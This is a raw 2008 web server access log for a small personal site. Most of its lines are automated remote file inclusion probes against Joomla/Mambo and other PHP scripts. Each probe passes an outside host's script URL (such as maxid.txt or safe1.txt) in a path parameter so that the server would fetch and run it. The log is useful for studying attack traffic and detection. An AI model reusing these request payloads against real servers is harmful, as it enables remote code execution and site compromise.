212.150.247.23 - - [16/Aug/2008:20:43:18 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
212.150.247.23 - - [16/Aug/2008:20:43:18 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
87.106.61.146 - - [16/Aug/2008:20:43:24 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
87.106.61.146 - - [16/Aug/2008:20:43:24 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
64.22.89.194 - - [16/Aug/2008:20:44:24 -0500] "GET /logs/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:20:44:24 -0500] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:20:44:25 -0500] "GET /logs/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:20:44:25 -0500] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.812"
66.230.197.245 - - [16/Aug/2008:20:44:42 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
66.230.197.245 - - [16/Aug/2008:20:44:42 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
62.144.33.204 - - [16/Aug/2008:20:45:00 -0500] "GET /logs/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
62.144.33.204 - - [16/Aug/2008:20:45:00 -0500] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:45:38 -0500] "GET /logs/access_log.1214438400/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:20:46:01 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
212.150.247.23 - - [16/Aug/2008:20:46:01 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.64.34.172 - - [16/Aug/2008:20:47:16 -0500] "GET /logs/access_log.1213488000//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:20:47:16 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:20:47:16 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:20:47:25 -0500] "GET /logs/access_log.1214438400//newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:20:48:56 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.150.247.23 - - [16/Aug/2008:20:48:56 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.208.43.121 - - [16/Aug/2008:20:49:03 -0500] "GET /logs/access_log.1214524800//agendax/addevent.inc.php?agendax_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:20:49:03 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:20:49:04 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
62.109.176.109 - - [16/Aug/2008:20:49:12 -0500] "GET /logs/access_log.1206230400//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
62.109.176.109 - - [16/Aug/2008:20:49:15 -0500] "GET //modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
62.109.176.109 - - [16/Aug/2008:20:49:18 -0500] "GET /logs//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:20:49:18 -0500] "GET /logs/access_log.1214179200//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:20:49:33 -0500] "GET /logs/access_log.1206748800//newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:20:49:35 -0500] "GET /logs/access_log.1213488000//newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:49:54 -0500] "GET /logs/access_log.1214438400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:49:54 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:49:54 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
65.111.166.193 - - [16/Aug/2008:20:49:55 -0500] "GET /logs/access_log.1208044800//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.810"
212.150.247.23 - - [16/Aug/2008:20:51:41 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
212.150.247.23 - - [16/Aug/2008:20:51:41 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
213.188.130.113 - - [16/Aug/2008:20:53:15 -0500] "GET /logs/access_log.1214524800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:53:15 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:53:15 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:20:53:23 -0500] "GET /logs/access_log.1206748800//newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:20:53:26 -0500] "GET /logs/access_log.1213488000//newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
119.63.193.56 - - [16/Aug/2008:20:54:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider_jp.html)"
69.64.34.172 - - [16/Aug/2008:20:54:26 -0500] "GET /logs/access_log.1206230400/modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:20:54:26 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:20:54:26 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
24.136.119.214 - - [16/Aug/2008:20:54:33 -0500] "GET /logs/access_log.1214524800//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.0" 404 309 "-""libwww-perl/5.805"
24.136.119.214 - - [16/Aug/2008:20:54:33 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.0" 404 282 "-""libwww-perl/5.805"
24.136.119.214 - - [16/Aug/2008:20:54:34 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.0" 404 287 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:20:54:42 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
212.150.247.23 - - [16/Aug/2008:20:54:42 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
80.67.20.109 - - [16/Aug/2008:20:55:02 -0500] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://museo.infoitos.com//components/com_rwcards/id.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.808"
80.67.20.109 - - [16/Aug/2008:20:55:02 -0500] "GET //modules/xfsection/modify.php?dir_module=http://museo.infoitos.com//components/com_rwcards/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
80.67.20.109 - - [16/Aug/2008:20:55:02 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://museo.infoitos.com//components/com_rwcards/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
74.55.113.226 - - [16/Aug/2008:20:55:31 -0500] "GET /logs/access_log.1208044800//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:56:10 -0500] "GET /logs/access_log.1214438400/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
98.28.196.66 - - [16/Aug/2008:20:56:25 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.webcrawler.com/webcrawler300/ws/results/Web/Vintage%20Tattoo%20Flash/1/302349/RightNav/Relevance/zoom=off/_iceUrlFlag=7?_IceUrl=true""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
98.28.196.66 - - [16/Aug/2008:20:56:25 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
98.28.196.66 - - [16/Aug/2008:20:56:25 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
98.28.196.66 - - [16/Aug/2008:20:56:26 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
66.249.71.119 - - [16/Aug/2008:20:56:31 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.119 - - [16/Aug/2008:20:56:31 -0500] "GET /costume/costume1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
98.28.196.66 - - [16/Aug/2008:20:56:34 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
212.150.247.23 - - [16/Aug/2008:20:57:30 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
212.150.247.23 - - [16/Aug/2008:20:57:30 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
87.106.61.146 - - [16/Aug/2008:20:57:51 -0500] "GET /logs/access_log.1208044800/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:21:00:32 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
212.150.247.23 - - [16/Aug/2008:21:00:32 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
62.109.176.109 - - [16/Aug/2008:21:01:04 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.109.176.109 - - [16/Aug/2008:21:01:08 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.6.22.107 - - [16/Aug/2008:21:01:44 -0500] "GET /costume/ HTTP/1.0" 200 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.188.130.113 - - [16/Aug/2008:21:02:26 -0500] "GET /logs/access_log.1213488000////?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:21:02:26 -0500] "GET ////?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 1245 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:21:02:27 -0500] "GET /logs////?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 95588 "-""libwww-perl/5.805"
87.106.61.146 - - [16/Aug/2008:21:03:35 -0500] "GET /logs/access_log.1206230400/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:21:03:40 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
212.150.247.23 - - [16/Aug/2008:21:03:40 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
87.106.16.155 - - [16/Aug/2008:21:04:47 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.thauros-clan.de/splash/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
87.106.16.155 - - [16/Aug/2008:21:04:47 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.thauros-clan.de/splash/id.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
69.73.189.205 - - [16/Aug/2008:21:04:49 -0500] "GET /logs/access_log.1213488000////?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:21:04:49 -0500] "GET ////?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 1245 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:21:04:50 -0500] "GET /logs////?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 95588 "-""libwww-perl/5.805"
208.116.39.133 - - [16/Aug/2008:21:05:49 -0500] "GET /logs/access_log.1214524800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.bangin-bros.de/picturesolution_211/install/id.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
87.106.77.242 - - [16/Aug/2008:21:05:51 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
87.106.77.242 - - [16/Aug/2008:21:05:52 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
208.116.39.133 - - [16/Aug/2008:21:06:21 -0500] "GET /logs/access_log.1211500800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.bangin-bros.de/picturesolution_211/install/id.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
212.150.247.23 - - [16/Aug/2008:21:06:42 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
66.230.197.245 - - [16/Aug/2008:21:08:06 -0500] "GET /logs/access_log.1208044800/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
89.208.43.121 - - [16/Aug/2008:21:09:02 -0500] "GET /logs/access_log.1214438400//agendax/addevent.inc.php?agendax_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:21:09:38 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
212.150.247.23 - - [16/Aug/2008:21:09:38 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
193.188.66.6 - - [16/Aug/2008:21:11:59 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 349 "-""libwww-perl/5.65"
193.188.66.6 - - [16/Aug/2008:21:11:59 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 349 "-""libwww-perl/5.65"
193.188.66.6 - - [16/Aug/2008:21:11:59 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 349 "-""libwww-perl/5.65"
193.188.66.6 - - [16/Aug/2008:21:11:59 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 344 "-""libwww-perl/5.65"
193.188.66.6 - - [16/Aug/2008:21:11:59 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 344 "-""libwww-perl/5.65"
193.188.66.6 - - [16/Aug/2008:21:11:59 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 344 "-""libwww-perl/5.65"
212.150.247.23 - - [16/Aug/2008:21:12:59 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
212.150.247.23 - - [16/Aug/2008:21:12:59 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
200.155.18.50 - - [16/Aug/2008:21:13:27 -0500] "GET /logs/access_log.1214438400//?custompluginfile[]=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
200.155.18.50 - - [16/Aug/2008:21:13:27 -0500] "GET //?custompluginfile[]=http://www.shopbijou.com/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
200.155.18.50 - - [16/Aug/2008:21:13:28 -0500] "GET /logs//?custompluginfile[]=http://www.shopbijou.com/id.txt??? HTTP/1.1" 200 95586 "-""libwww-perl/5.805"
200.155.18.50 - - [16/Aug/2008:21:13:56 -0500] "GET /logs/access_log.1214179200//?custompluginfile[]=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:21:15:55 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
212.150.247.23 - - [16/Aug/2008:21:15:55 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
74.6.22.107 - - [16/Aug/2008:21:16:00 -0500] "GET /logs/access_log.1188604800 HTTP/1.0" 200 177628 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.230.197.245 - - [16/Aug/2008:21:16:47 -0500] "GET /logs/access_log.1206230400/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
74.6.22.107 - - [16/Aug/2008:21:17:44 -0500] "GET /logs/access_log.1213574400 HTTP/1.0" 200 449643 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.109.176.109 - - [16/Aug/2008:21:17:46 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
62.109.176.109 - - [16/Aug/2008:21:17:49 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
121.220.25.47 - - [16/Aug/2008:21:17:53 -0500] "GET /tattoo/set4.htm HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:21:17:53 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:21:17:54 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:21:17:54 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:21:17:54 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:21:17:54 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:21:17:54 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
